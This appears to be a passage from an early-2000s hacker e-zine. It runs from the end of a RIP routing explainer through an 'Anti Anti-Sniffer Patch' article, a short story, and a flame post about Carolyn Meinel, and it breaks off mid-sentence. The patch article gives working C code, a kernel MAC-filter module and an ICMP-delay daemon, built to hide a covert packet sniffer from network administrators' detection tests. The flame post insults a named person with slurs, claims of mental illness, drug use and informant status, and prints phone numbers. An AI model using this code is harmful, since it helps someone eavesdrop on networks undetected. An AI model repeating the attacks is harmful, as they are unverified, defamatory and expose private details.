keep non-RIP nodes from being bothered by RIP announcements. Broadcast announcements are still supported. = Microsoft Specific RIP Features = Just as with everything else, Microsoft has dipped it's hand into the RIP pot and pulled out some honey. They have implemented an enhanced, albeit optional, variation to the traditional split horizon in Windows 2000. Split horizon with reverse poison. But, unlike split horizon, a Windows 2000 RIP router that has enabled reverse poison announces all of it's routes. The big difference here is that the routes that were learned in a given direction are announced with a hop count of 16, indication of an unreachable network. Although this has no benefit in a single-path internetwork, in a multi-path internetwork substantially reduces the count-to-infinity and routing loop problems that commonly occur with RIP. The biggest disadvantage of split horizon with reverse poison is the increased overhead of announcing all routes. = RIPv1 Packet Details = RIPv1 messages are encapsulated in UDP (User Datagram Protocol) packets and broadcast to the subnet on port 520. The RIPv1 packet header consists of three fields totaling 4 bytes in length. The header format is diagrammed (from RFC 1058) and defined below: 0 1 2 3 3 0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1 +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+ | command (1) | version (1) | must be zero (2) | +---------------+---------------+-------------------------------+ * The command byte determines the purpose for the packet. A value of 0x01 is a request for the neighboring routers to send all or part of their routing tables. A value of 0x02 is a response containing all or part of the router's routing tables. The response is usually sent in response to a request or to a poll. Values of 0x03-04 have been obsoleted and are ignored. Sun Microsystems has implemented 0x05 for it's own uses (this might warrant further investigation). This field is 1 byte in length. * The version byte, obviously, contains the RIP version being implemented in the packet. Since we're just going over RIPv1 at the moment, this will always be 0x01. This field is 1 byte in length. * The last two bytes of the header are unused and should always be zero. This field is 2 bytes in length. The rest of the RIPv1 message consists of 1 to 25 routes, each 20 bytes in size. If there are more than 25 routes to send in an announcement, an additional announcements will be sent. Each route consists of six fields that define the routes characteristics. They are diagrammed (from RFC 1058) and defined below: 0 1 2 3 3 0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1 +-------------------------------+-------------------------------+ | address family identifier (2) | must be zero (2) | +-------------------------------+-------------------------------+ | IP address (4) | +---------------------------------------------------------------+ | must be zero (4) | +---------------------------------------------------------------+ | must be zero (4) | +---------------------------------------------------------------+ | metric (4) | +---------------------------------------------------------------+ * The address family identifier is used to indicate to the router what protocol the route will be use for. Usually this will always be 0x02 indicating the IP family, although there is also RIP for IPX. This field is 2 bytes in length. * The next field is not used in RIPv1 and will always consist of zeros. This is used in RIPv2. This field is 2 bytes in length. * The IP address is the destination for the route. This can be one of several values; a subnet network ID, an IP address when defining a host route, or 0.0.0.0 when defining the default route. When sending a request message, this will always be 0.0.0.0. This field is 4 bytes in length. * The next two field are both unused in RIPv1 and should consist of only zeros. These are used in RIPv2. Each of these fields are 4 bytes in length. * The last field, metric, is the number of hops that must be crossed to reach the network defined in the IP address field. This is a 4 byte field. = RIPv2 Packet Details = RIPv2, like RIPv1, can be encapsulated in UDP packets and broadcast to the subnet. However it also has the optional capability to use IP multicasting, sending announcements to 224.0.0.9. The RIPv2 header is identical to the RIPv1 header, with the minor exeption of the version number in the second field. The header format is diagrammed (from RFC 1723) and changes from RIPv1 are defined below: 0 1 2 3 3 0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1 +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+ | Command (1) | Version (1) | unused | +---------------+---------------+-------------------------------+ * The second field, version, should always be 0x02 in RIPv2. For details on the other fields, refer to the RIPv1 header details in the section above. This field is 1 byte in length. For backward compatibility the RIPv2 message format is identical to the RIPv1 message format. The key here is that RIPv2 takes advantage of the unused fields that exist in the RIPv1 message. The creators of RIP were obviously thinking ahead. Again, there can only be up to 25 routes in an announcement. The header format is diagrammed (from RFC 1723) and changes from RIPv1 are defined below: 0 1 2 3 3 0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1 +---------------+---------------+-------------------------------+ | Address Family Identifier (2) | Route Tag (2) | +-------------------------------+-------------------------------+ | IP Address (4) | +---------------------------------------------------------------+ | Subnet Mask (4) | +---------------------------------------------------------------+ | Next Hop (4) | +---------------------------------------------------------------+ | Metric (4) | +---------------------------------------------------------------+ * The route tag was unused in RIPv1. This was originally used to distiguish between RIP routes and routes outside of the RIP environment. This field is 2 bytes in length. * The subnet mask is one of the defining points of RIPv2. It's inclusion allowed RIP to survive in a world or reduced address space. This field contains the subnet mask for the IP address in the IP address field. This field is 4 bytes in length. * The next hop is used to define the gateway for the IP address in the IP address field. This field will be set to 0x00-00-00-00 if the route announcement is coming from the gateway. This field is 4 bytes in length. = RIPv2 Authentication = RIPv2's method for passing authentication is rather simple, but it's quite effective. Normally a route entry would be the first thing, after the RIP header, occupying the RIP announcement. But when using authentication, the first route entry is replaced with an authentication entry. The authentication entry is the same size, but the last four fields of the route entry are replaced with a single 16 byte field that contains the authentication password as either clear text, encrypted text, or in the form of a hash (such as MD5). The modified route entry used for authentication is diagammed (from RFC 1723) and defined below: 0 1 2 3 3 0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1 +---------------+---------------+-------------------------------+ | 0xFF-FF | Authentication Type (2) | +-------------------------------+-------------------------------+ ~ Authentication (16) ~ +---------------------------------------------------------------+ * The first field is normally seen as the address identifier field that identifies the route protocol. When using authentication, this field is replace with 0xFF-FF which indicates the use of authentication. Routers not using authentication will see this as an invalid route and will ignore it. This field is 2 bytes in length. * The authentication type fields defines for the router what method of password encryption is being used. RCC 1723 only defines simple (clear text) password authentication, indicated by 0x02. Some routers do support MD5 and other methods of password encryption. This field is 2 bytes in length. * Finally, the authentication field is what contains the password. Passwords are only limited to 16 characters in order to preserve the route entry appearance. The passwords are left-justified and padded with 0x00 (null) characters. This field is 16 bytes in length. Something to keep in mind is that because the authentication entry takes the place of the first route entry, you will have one less route passed with each RIP annoucement. Of the 25 possible entries, only 24 of them can be route entries. = Thanks = I'd like to thank a couple people for making suggestions on what to include and helping with the overall readability of the article: evilrabbit, Intelagent [ANTI ANTI-SNIFFER PATCH]============================================[vecna] http://www.s0ftpj.org - Italian security/hacking group. HISTORY: Summer 2000: Thought of the patch November 2000: published code and italian file July 2001: I know that the code published on packetstorm cannot be understood, this invites me to write this readme file. This work is coded and tested under Linux kernel 2.2[.15|.16] FOCUS of this document is: i) Make possible patch to elude anti sniffer and some programs that use the series of technique explained by l0pht's studies. ii) Suggest possible techniques for secure sniffer discovery. Mac Address Check This is a old technique, consisting of send packets to valid ip address but with fake mac destination address, some stacks doesn't check datalink layer header and give packets at superior layer. Usually is implemented with ICMP echo request and arp request, but can be used with any kind of packets of any protocol. Simple you send erroneous packets and if you received some reply you are sure that source of reply is running in promiscuous mode. Fix Simple: the anti sniffer works because any stack will reply without checking the destination mac. It's simple to make a kernel patch for dropping any packets with a destination mac address different from network card mac address and different to "ff:ff:ff:ff:ff:ff" (used as mac broadcast). Implemented as kernel module for linux 2.2. DNS Resolver Check Some sniffers will try to resolve the sniffed IP to aid the user in indentification. This feature can be attacked by anti-sniffer check. The check appears as a SYN flood with random destinations, while reading the DNS requests made my the sniffing device. If you see DNS requests on the network while performing this, chances are, you have a sniffing device on the network. Fix DNS resolving is due to gethostbyname() resolve function. You must remove it from sniffer code (or disable it) and use a IP only format. In addition, if you want to resolve addresses anyway, you can always watch the network traffic of the target sniffer (if he is resolving). Network Latency Test - admin host start to pinging one network interface and trace the medium of him icmp echo reply - admin host start syn flood on the network for non-existent IP. - admin host check echo reply statistic after starting of flood. If the network interface has a heavy ping reply time increment it's due to hard network traffic, due to the flood, because network card is running in promiscuous mode, this anti sniffer check work over the physical law "more work -> more time". Fix Few time before anti anti sniffer patch, I've coded libvsk. Libvsk is a library suite for manipulating ongoing traffic working BEFORE the kernel using this concept: From userspace I set firewalling rules to DROP certain packets, From userspace I set datalink socket to read the packets that before raw socket layer kernel drop for my explicit request with firewall rules. With this library, you can code lots of nice applications related to network direction and similar things. For more info check http://www.s0ftpj.org and search libvsk and example spf.c, This is coded for kernel 2.2, after I've coded some applications working under kernel 2.2 2.4, I will port to *BSD with ipfw and solaris (or other system) with ipf, using system(3) than manually setsockopt/ioctl for add filtering rules (it's very hard filling certain structures)... For eluding network latency test I've coded a simple program that will drop any ICMP echo request before kernel reply, read some request and DELAY the reply. Admin knows that network run on prom. mode when he sees great increments on echo reply ... such 0.1 to 3.0 ... but if you set manually a delay such 3.0 in normal condition, when flood start cannot be view great increment, and btw never can be to 30 times (3.0 / 0.1) but lower that 1/0.5 times. THE CODE: - lodable module for source ethernet address check - - for more info read phrack 55 - 12 - /* # gcc -O6 -c aasp_lkmachk.c -I/usr/src/linux/include # insmod aasp_lkmachk.o device=eth0 # rmmod aasp_lkmachk Anti Anti Sniffer Patch (by vecna@s0ftpj.org) - MAC checker module */ #define MODULE #define __KERNEL__ #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include #define r_mac sk->mac.ethernet->h_dest /* received mac */ #define t_mac true->dev_addr /* true mac */ char *device; MODULE_PARM(device, "s"); struct device *true; struct packet_type aasp_ip, aasp_arp; int chk_mac_arp(struct sk_buff *sk, struct device *dev, struct packet_type *pt) { if( r_mac[0] ==r_mac[1] ==r_mac[2] ==r_mac[3] ==r_mac[4] ==r_mac[5] ==0xff) /* ARP broadcast */ goto end; if( (r_mac[0] !=t_mac[0]) || (r_mac[1] !=t_mac[1]) || (r_mac[2] !=t_mac[2]) || (r_mac[3] !=t_mac[3]) || (r_mac[4] !=t_mac[4]) || (r_mac[5] !=t_mac[5]) ) { /* ARP mac spoof detected */ sk->nh.arph->ar_hrd = 0; sk->nh.arph->ar_pro = 0; sk->nh.arph->ar_op = 0; goto end; } end: kfree_skb(sk); return(0); } int chk_mac_ip(struct sk_buff *sk, struct device *dev, struct packet_type *pt) { /* read #define(s) after #include(s) */ if( (r_mac[0] !=t_mac[0]) || (r_mac[1] !=t_mac[1]) || (r_mac[2] !=t_mac[2]) || (r_mac[3] !=t_mac[3]) || (r_mac[4] !=t_mac[4]) || (r_mac[5] !=t_mac[5]) ) { /* IP check - anti spoof detect! */ sk->nh.iph->tot_len = 0; sk->nh.iph->check = 0; } kfree_skb(sk); return(0); } int init_module(void) { if (device) { true =dev_get(device); if (true ==NULL) { printk("Did not find device %s!\n", device); return -EINVAL; } } else { printk("Usage: insmod aasp_lkmachk.o device=device name \n\n"); return -ENODEV; } printk("Mac checker module run on %s - by vecna@s0ftpj.org\n",device); printk("Full codes of Anti Anti Sniffer Patch can be" " downloadated at www.s0ftpj.org\n"); aasp_ip.dev = true; aasp_ip.type = htons(ETH_P_IP); aasp_ip.func = chk_mac_ip; aasp_arp.dev = true; aasp_arp.type = htons(ETH_P_ARP); aasp_arp.func = chk_mac_arp; dev_add_pack(&aasp_ip); dev_add_pack(&aasp_arp); return(0); } void cleanup_module(void) { dev_remove_pack(&aasp_ip); dev_remove_pack(&aasp_arp); printk("Anti Anti Sniffer Patch - MAC checker module unload\n"); } -- fake network latency test: /* Fucker Latency of test for Anti Anti Sniffer Patch */ #include "libvsk.h" /* www.s0ftpj.org for more info */ #include extern int errno; #define fatal(M) { \ perror(M); \ exit(0); \ } #define IPSIZE sizeof(struct iphdr) #define ICMPSIZE sizeof(struct icmphdr) #define IIPKTSIZE sizeof(struct iipkt) int check_dup(struct iipkt *); void build_reply(struct iipkt *, struct sockaddr_in *, struct iipkt *); unsigned short ip_s(unsigned short *, int); int main(int argc, char **argv) { int dlsfd, offset, forward, hdrincl =1, pkt_info[4], x; char ipdst[18], *rcvd =malloc(IIPKTSIZE); struct ifreq ifr; struct in_addr in; struct iipkt *reply =malloc(IIPKTSIZE); printf("\t Anti Anti Sniffer Patch for elude latency test\n"); printf("\t by vecna - vecna@s0ftpj.org - www.s0ftpj.org\n\n"); if(argc != 3) { printf( " usage %s interface fakedelay\n\n", argv[0]); exit(0); } printf(" running on background\n"); if(fork()) exit(0); pkt_info[0] =pkt_info[1] =ICMP_ECHO; pkt_info[2] =0; pkt_info[3] =0xFFFF; x =socket(PF_INET, SOCK_DGRAM, IPPROTO_IP); strncpy(ifr.ifr_name, argv[1], sizeof(ifr.ifr_name)); if(ioctl (x, SIOCGIFADDR, &ifr) < 0) fatal("unable to look local address"); memcpy((void *)&in, (void *)&ifr.ifr_addr.sa_data +2, 4); strcpy(ipdst, (char *)inet_ntoa(in)); close(x); dlsfd =set_vsk_param(NULL, ipdst, pkt_info, argv[1], IPPROTO_ICMP, IO_IN, IP_FW_INSERT, 0, 0); if(dlsfd < 0) fatal("set_vsk: IP_FW_INSERT"); if((offset =get_offset(dlsfd, argv[1])) <0) fatal("get device offset"); if((forward = socket(AF_INET, SOCK_RAW, IPPROTO_ICMP)) == -1) fatal("forward socket - SOCK_RAW"); if((x = setsockopt(forward, IPPROTO_IP, IP_HDRINCL, &hdrincl, sizeof(hdrincl))) == -1) fatal("setsockopt - IP_HDRINCL"); while(1) { struct iipkt *packet; static int last_id; read(dlsfd, rcvd, IIPKTSIZE); (char *)packet = rcvd + offset; if(check_dup(packet)) continue; if(check_packet(packet, IPPROTO_ICMP)) { struct sockaddr_in sin; build_reply(packet, &sin, reply); usleep(atoi(argv[2])); x =sendto(forward, (char *)reply, ntohs(reply->ip.tot_len), 0, (struct sockaddr *)&sin, sizeof(struct sockaddr) ); if(x < 0) fatal("sendto on forwarding packet"); } memset(packet, 0, IIPKTSIZE); } free(rcvd); /* never here */ } void build_reply(struct iipkt *packet, struct sockaddr_in *sin, struct iipkt *reply) { memcpy((void *)reply, (void *)packet, IIPKTSIZE); reply->ip.id =getpid() & 0xffff ^ packet->ip.id; reply->ip.saddr =packet->ip.daddr; reply->ip.daddr =packet->ip.saddr; reply->ip.check =ip_s((u_short *)&reply->ip, IPSIZE); reply->icmp.type =ICMP_ECHOREPLY; reply->icmp.checksum =0x0000; reply->icmp.checksum =ip_s((u_short *)&reply->icmp, ntohs(packet->ip.tot_len) - IPSIZE ); /* setting sockaddr_in stuctures */ sin->sin_port =htons(0); sin->sin_family = AF_INET; sin->sin_addr.s_addr = reply->ip.daddr; } int check_dup(struct iipkt *packet) { static int last_id; int id =htons(packet->ip.id); if(id ==htons(last_id)) return 1; last_id =packet->ip.id; return 0; } u_short ip_s(u_short *ptr, int nbytes) { register long sum = 0; u_short oddbyte; register u_short answer; while (nbytes > 1) { sum += *ptr++; nbytes -= 2; } if (nbytes == 1) { oddbyte = 0; *((u_char *) &oddbyte) = *(u_char *)ptr; sum += oddbyte; } sum = (sum >> 16) + (sum & 0xffff); sum += (sum >> 16); answer = ~sum; return(answer); } -- Ideas for new anti sniffer (or anti anti anti sniffer :) ? Make the same work used on network latency test but use for check TCP packets, for network statistic, also tcp can be used, think to SYN packets for port 0, any host reply with RST+ACK, you may use time of RST+ACK reply for trace network statistic and for viewing REAL network congestion statistic after start the flood. BTW: this system cannot be accurate for some things how ... - local and remote load average network undependent ... - your local network device congestion due to your flood - network driver, ram, cpu, kind of device - runnng of program working on datalink/raw layer - other ? Using network restriction is a good idea for detect prom. cards, this can be tested with systems on your network that you admin yourself or your friends ... or other cases such LAN party is easy put network card without ip address and with arp filtering (for drop any arp broadcast), this mean that you may sniff without problem :) /* Editors Note: Sorry about the translation vecna, I was tired! */ [The Wait (fiction)]=============================================[Digital Ebola] The Wait Digital Ebola Night. Desert. Passed out in the sand, was a man. He started to come to. Groggy, disoriented, the moon was bright. The man stood up. His legs almost buckled under his weight. The man held fast. Standing, he started to wonder where he was. He began to wonder who he was, and why he was there. He was chilled by the night air. A predatory bird of some form screeched in the distance. The man began to walk. As he started to walk, the man's mind began to start asking the seemingly unanswerable questions. Here he was in the desert with no clue as to why or how, he did not even know his own name. First things first, the man thought. Inventory. He was wearing blue jeans, a white shirt, and boots. His hair was kept short, and beard stubble was started to develop. He guessed he was about in his late 20's, early 30's. He continued to walk, checking the contents of his pockets. In his breast pocket, there was a pack of cigerettes. Do I smoke, thought the man to himself. He did not know. He checked his other pockets. He produced a silver zippo lighter and a crumpled piece of paper. Sticking a cigerette in his mouth, he started to pray the lighter worked. He did not care if he smoked or not, he needed the absoulute normality of something making sense. He flicked the lighter. Click. Nothing. Click. Nothing. Sighing, the man flicked once more, producing a flame. As he lit the cigerette, he inhaled. The man did not cough. As the easing calm of the cigerette rushed thru his veins, his mind began to become clear. He relized that he was still clutching the crumpled piece of paper. He unfolded it and read it: John, I hope you have a great time on your vacation, I miss you! With love, Maria Now, the man was more confused. Was he John? He kicked at the sand as he began to climb a sand dune. He finished his cigerette and flicked it into the sand. The moon shone bright, and from the top of the dune, all he could see was more sand. He stopped. "WHO AM I?", he screamed. He was answered by a coyotes howl. There was noone else. Desperate to get answers, he began to walk even faster. The faster he walked it seemed, the faster his mind would race. Over and over the questions kept pounding him. And over and over, the answers eluded him. There was nothing on this chilly night to help him. He kept pace, and began to sing some tune. He was not happy, but singing helped get his mind off the questions. Never before in his memory had he felt so alone, although he could not remember a single detail of his life, he knew that he had never before been overcome by the misery he was undergoing. The sun began to rise. As the sun began to rise, the man noticed that he was really thirsty. His mouth was dryer then the desert he transversed, and his tongue was numb. He was almost out of cigerettes, and his hopes of finding his answers were fading. He estimated that he had been walking about 7 hours, and the thoughts of leaving this horrible place were non-existent. As he topped the next dune, he heard a vehicle. His pulse rose. He raced to the very top of the dune. He could see a city! There was a truck coming towards him. HEY! The man yelled. His throat was dry. He yelled again. The truck seemed to accelerate. The man ran down the dune. When the man reached the truck, its lone driver stopped, and opened the door. Before the man could utter a word, the driver produces a hi-power rifle. The only audience for the gunshots was the driver and the vultures overhead. The man awoke. He was strapped in a hospital bed. He tried to cry out. He could make no sound. A nurse came in. The man tried to speak, but the nurse just ignored him, and walked out the door. A few minutes later, a doctor came into his room with the nurse. "Ahh, Mr. Hammerman, I see that you have awakened....", chided the doctor. And with that, the nurse handed the doctor a syringe, and the doctor injected the man, forever dooming him to the desert. Night. Desert. The man awoke.... [Carolyn Does It Again]======================[Why Won't This Bitch Just Go Away] Date: Tue, 10 Jul 2001 22:55:39 -0500 (CDT) From: Digital Ebola To: dc-stuff@dis.org Subject: Carolyn does it again. Hi! I am Digital Ebola. Many of you remember me from such escapades as "Drunk Man on Couch, Defcon 7" and "They cant declare war!". I have recently aquired the entire ACPO/Carolyn Meinel aka Granny Bitch Who Derails Trains with Timex Sinclair story, and I wish to share it. The below items were not written by me, but by a close friend who wishes to remain anonymous. Enjoy! Digital Ebola www.legions.org www.legions.org/~digi/ "Network penetration is network engineering, in reverse." ---------------------------------------------------------------------- I have watched as Carolyn has slandered ACPO in much the same way that she slandered Bronc and Jerico. The Board of Directors for ACPO won't respond. They don't want to make a big to-do of it. The Board of Directors believe that, much like a cold she will go away. I hate to see good people like Natasha slandered by this 'woman'. I prepared a response that they would not release. So I will. --- In early march, Carolyn Menial posted the address of ACPO, along with PedoWatch.org, Cyberarmy.org, and Condemned.org on her site as an example of white hats who were working to eliminate child pornography and child predators from the network. Natasha, the Founder of ACPO, became aware of this and was concerned about the linking of ACPO to 'hacking', if even in the 'white' sense. Information was sent regarding Carolyn's webpage to ACPO's contacts in each Organization. Almost two years ago, ACPO made the strategic decision to rely on traditional activist techniques, while supplementing the technical ability of law enforcement agencies. The rationale being that child pornography, at its core, is not a technology issue, but a human issue. Technology is used to facilitate the commission of the crime, by transmitting the contraband over geographic distances and linking pedophiles worldwide. In this transition, ACPO (Formerly ACPM) divested itself of the 'Hacker' Moniker. This was done due to the fact that it was a hurdle to interfacing with law enforcement allies who were also working handle and eliminate the electronic movement of child pornographic images. It is unfortunate that 'Hacker' has come to be synonymous with criminals, however the crusade to rectify its misuse would only detract from our mission. On March 17, 2001 Natasha Grigori sent the following email to Carolyn Menial: >Dear Carolyn Menial, > >It was brought to my attention that on your site, happyhacker.org, >there is a story[1] referring to AntiChildporn.org as a group of >white hat hackers. The Antichildporn Organization is an Non For >Profit corporation registered in the State of Minnesota. We are >not hackers, of any color hat or alignment. Our mission is focused >on educating and facilitating law enforcement agencies in the >elimination of child pornography on the net. To liken us to hackers, >in any regard, is tantamount to defamation of character. We request >that you remove the reference to us, or correct the cited page below >to omit the reference to white hat hackers. > >http://www.happyhacker.org/defend/vigilante.shtml > Carolyn promptly responded to Natasha and the Board of Directors. Her response, though having the tone that one would take when trying to explain to a child why he should not put kitty into the washing machine, lead Natasha and the BOD to belive that they could quickly resolve this matter. > I'm sorry that you consider white hat hackers to be evil. Perhaps you are > not aware of what white hat hackers, and hackers in general are? We are > computer professionals with exceptional skills (as promoted on our web site, > and widely called "white hat hacking"). We do more than most people realize > to combat crime on the Internet, as well as develop free software such as > the world's most widely used web server (Apache) and the world's third most > widely used operating system (Linux). You also may wish to do a search on > the word "hacker" at Amazon.com. You will find books that chronicle the many > good works done as a community, nonprofit service by hackers. For example, > you will learn that hackers invented email and newsgroups. > > How about checking out our web site? You will see that we take a hard line > against computer crime happyahcker.org/crime/. Our "Have a great life" > section (happyhacker.org/greatlife/) reports news from our many volunteers. > In fact, the only page on our web site that mentions your organization is > devoted to offering computer exerts (HACKERS) opportunities for community > service(happyahcker.org/defend/vigilante.shtml). If you check out > happyahcker.org/news/ and go back a ways, you will find that comptuer > criminals have wages quite a war trying to drive us off the Internet. > > If you decide, after reconsidering this, that you still do not wish the > services of computer experts with exceptionals skills, please let me know > and we will remove you from our opportniies for community service. > A member of the Board of Directors, Doug Stead, was the first to receive this letter and responded to Carolyn. In his letter he elaborated on the reasoning behind the distancing from 'hacking', even 'white hat hacking' using his usual lack of tact. > Hi Carolyn, > > I am a Director of the ACPO organization. I would like you to > understand why we take the position we do with regards to white hat hacking. > > We have in the past had good relationship with white hat hackers. We > however are trying to build ties with Law Enforcement, whom can not > be associated in any way with criminal activities. Hacking no matter for > good, is a crime and this bring conflict us into conflict with Law > Enforcement. > > Vigilantism and the criminal justice system are mutually exclusive, > as one is rightly-so bound by the rule of law, and the other is not. That > our goals are the same, I hope, does not, out-weigh the potential damage > done to the trusted lines of communication we have built. The old saying > come to be true, "two wrongs don't make a right", and a bad guy doing good > is still a bad guy. Hence we (ACPO) can have nothing to do with crime of > any kind. > > I wish you all the best, and hope that you never get caught. Cheers, > > Doug Stead Apparently this did not sit well with Carolyn. Did she fear that she would be caught? I do not know, I do know that her reply seemed to foam from the mouth much in the same way that would cause a veterinarian to put down a dog for fear of rabies. >From: Carolyn Meinel > >First, my apologies if Mr. Stead's email was forged by an enemy of your >organization. If it was forged, please ignore the rest of this email >Hacking is not a crime. I'm surprised that even after treading my attempt to > >help you with this, that you still insist it is crime. >Everywhere my web site upholds legal behavior and insults and attacks >criminal actions. I take offense at your suggestion that I commit crime >("hope you never get caught"). Before you accuse anyone of computer crime, >especially anyone who crusades against computer crime, you ought to consult >first with your conscience, and secondly with a lawyer. >The whole point of proper use of the English language is to keep definitions > >the same. When you and your associates try to redefine hacking, and in >particular white hat hacking, as crime, you libel those who have never >broken the law such as predator-hunter.com, which use hacking skills to >assist and train law enforcement. (We at happyhacker.org have also helped >train law enforcement.) >You say you used to work with white hat hackers. Either they were really >white hats, and did not break the law, or they broke the law and should >therefore be called black hats. If you were using criminal services, your >organization is guilty of crime. >If you were using the white hat term in the normal sense (AKA the Lone >Ranger), then you are treating your volunteers unfairly and may be in danger > >of prosecution for libel. >Either way, you are in trouble. Any organization that works with law >enforcement should be doubly careful to avoid breaking the law. It's also >not wise to accuse a journalist who writes approximately one popular book >per year of committing crime. >Unless I get a REALLY good explanation of what you people are up to, I will >move your group from happyhacker.org/defend/ to happyhacker.org/sucks/ . >Your group will join Se7en's crusade in my upcoming book as an example of >the hazards of Internet groups that claim to fight kiddie porn. >Given the seriousness of your accusations against your volunteers and me, if > >we communicate further, it should be via phone. Please call me at >505-281-9675 if this was really your email. If memory serves, There are some questions as to the legality of carolyn's actions. http://www.attrition.org/shame/www/investigated.html And then there is plagiarism (not good for a world-class author like Carolyn) http://www.attrition.org/shame/www/bo-cm.plag.01.html And then again, there is the slander and libel (even before ACPO) http://www.attrition.org/slander/ And then there is drug use: http://www.attrition.org/shame/www/drugs.001.html Perhaps this explains 'Happy Hacker'. Humm. Should I go on? Now, where was I? Ahh. After this little letter, Doug called Carolyn. In part to find out what was going on, and also with concern that in her mental state was degrading and that she may do something to harm herself. Unfortunately.. um, we don't have a carbon copy of that phone call. After the phone call, Doug sent this email out: > >Hello, > >I just got off the phone with one Carolyn Menial, whom is very upset >with me for my putting the words hacker and criminal together in the >same sentence. She was really upset, and at times almost incoherent. >She did not like my 2nd email to her any better and did not consider >it a suitable apology. Albeit, I don't think I have anything to >apologies for, she never the less hung up on me after about 5 minuets >of listening to her rant and rave. > >I suspect there is something else going on here, she claims death >threats have been made against her and that she and her organization >have been the target of millions of dollars worth of damage done my >cyber attacks by "computer criminals". Extreme paranoia combined with >a large dollop of persecution together with a very aggressively >defensive posture. > >I suspect that I and perhaps ACPO have not herd the last of this >person. She claims to be a forensic computer professional, a book >writer and with powerful connections. I would not be at all surprised >to see her attack the ACPO organization on her web site and in any >book she may publish. Certainly well beyond any reasonable action, >even if I had indeed slandered or liable her. > >This is of course not the case, as my original email was not broadcast >to anyone, even the BoD of ACPO and went instead directly back to her >as a reply to her email. > >Cheers, and who said this would be easy, or that there was any common >about common sense! > >Doug Now, Carolyn -- not to be out done -- decided to direct her angst against the world to Doug and ACPO. Most recently on her site is this recent tirade against ACPO and Doug. Interestingly enough, four of her seven paragraphs are directly dealing with Doug -- the director who tried to gently tell her to go do something with herself -- and likely also gave a few suggestions on how to do it. Now, to address the issues and slander on her webpage: >Antichildporn.org disintegrating! > >Founder and leader Natasha Grigori has, according to their web site, >taken a leave of absence for unspecified medical reasons. Their >webmaster has quit. According to our sources, she quit when she realized >she was being exploited. The remainder of Antichildporn.org is trying to >cover it up. First, Natasha Grigori has taken a leave of absence for medical reasons. She will be at defcon this year, yes. Those who know her and know of her situation also know that this may be her last defcon. Unfortunately her cancer has progressed beyond what may be treated. It is rare to find an individual willing to campaign with such passion on an issue as Natasha Grigori. At times it is her anger and hate of those who abuse children, much in the same way as she was abused, that keeps her going. Yes hate is powerful, and sometimes it will keep us going long after everything else has failed. >The former webmaster of the ACPO resigned to due time >constraints and an inability to continue to volunteer their services - >nothing more. A new webmaster has since volunteered and taken over >administration of the website. > >A Federal investigation is rumored to be in progress. It happens to be >child sexual abuse to recruit children to troll the Web for porn and >report instances of kiddie porn. In the case of Antichildporn.org, these >children were not even reporting kiddie porn to the authorities. >Instead, they report directly to a form on the Antichildporn.org web >site. Under questioning, >the leaders of Antichildporn.org were unable to cite a single instance >of actual prosecutions arising from these reports. ACPO is unaware of any ongoing investigation, although considering Meinel's status as a confidential FBI informant (listed status "MI" and "PS", "MI" indicating that she suffers from a mental or emotional dysfunction, and that all information must be scrutinized as such (for more on her mental dysfunction, see http://www.attrition.org/shame/www/wacko.001.html), "PS" indicating that she is a Probable Suspect - http://www.antionline.com/cgi-bin/News?type=antionline&date=07-26-1999&s tory=Route.news), she may be trying to have one started - although the following quote probably sums up how seriously the FBI would take her accusations: "That bitch calls me every single fucking day. That chick is nuts. I'm afraid to even answer my phone anymore." -- Washington, D.C. FBI Agent Mike Bellis talking about Carolyn Menial - (http://www.genocide2600.com/~tattooma/quotes.txt). While Meinel correctly states that it is "child sexual abuse to recruit children to troll the web for porn", the ACPO does nothing of the sort. Meinel knows this, which is why the accusation is implied. In fact, in the liaison job description posted plainly on the ACPO website @ http://www.antichildporn.org/liaison.cfm, it is specifically stated that liaisons are _not_ asked to locate child pornography. There is a form that exists on the ACPO website to report instances of child pornography, however, contacting the authorities is encouraged, the form simply facilitates a means by which child pornography can be reported by those wishing to maintain their anonymity, and instances of child pornography reported to the ACPO are given to the proper authorities. >Who the heck are these guys? Natasha is an alias. According to our >sources, she is well-meaning, but naive. Most of the rest of the >AntiChildPorn points of contact use aliases. Doug Stead, who is listed >as their "Vice Chairperson," was careless enough to leave a message on >Carolyn Meinel's answering machine in which he claimed to be "The >director" (not even "a" director) "of the International Society for >Policing Cyberspace ." Of course, as a reporter, >I (Carolyn) am saving that tape. Natasha is an alias. After being abused by her father, she changed her name, though not through the legal system, rather then carry the mantel as a reminder of the horrors she survived. Doug Stead is on the Board of Directors for the International Society for Policing Cyberspace, and is plainly listed on the directors page of the International Society for Policing Cyberspace as such (http://www.polcyb.org/directors.html) . A much more interesting question is 'Who the heck is Carolyn Meinel, and what would possess her to libel and attack an organization that wants to end child pornography and identify pedophiles?' http://www.attrition.org/shame/index2.html http://www.pervertedlogic.com/pserv/old/meinel.htm http://www.dis.org/shipley/cpm/ http://www.dhp.com/~fyodor/meinelfraud.txt >Since he was not listed on the Society for Policing Cyberspace > web site, www.polsci.org is not the website for the organization being discussed, www.polcyb.org is - in fact, the domain polsci.org isn't even registered. $ whois polsci.org [whois.crsnic.net] Whois Server Version 1.3 Domain names in the .com, .net, and .org domains can now be registered with many different competing registrars. Go to http://www.internic.net for detailed information. No match for "POLSCI.ORG". Again, I am amazed at her UberHaxor Happy Hacking skills -- able to find sites that don't even exist. > I spoke with him over the phone (604-527-1100) to try to clear up the >problem. He directed me to , the same site I had >been look at, which claims to represent that organization. He said it >was, in fact, the web site of the organization he claims to direct."Just >phone them, they'll vouch for me," he said. As previously mentioned, Doug Stead is plainly listed on the Directors page of the site Meinel mentions (as Douglas Stead) she "had been look at". Since Meinel obviously won't take the time to proofread her own story, one wonders how much time (if any) was spent investigating the credibility of her "sources". >I phoned one of the people listed there as a director, Phil Ortega, CEO >of World net Technologies. He has 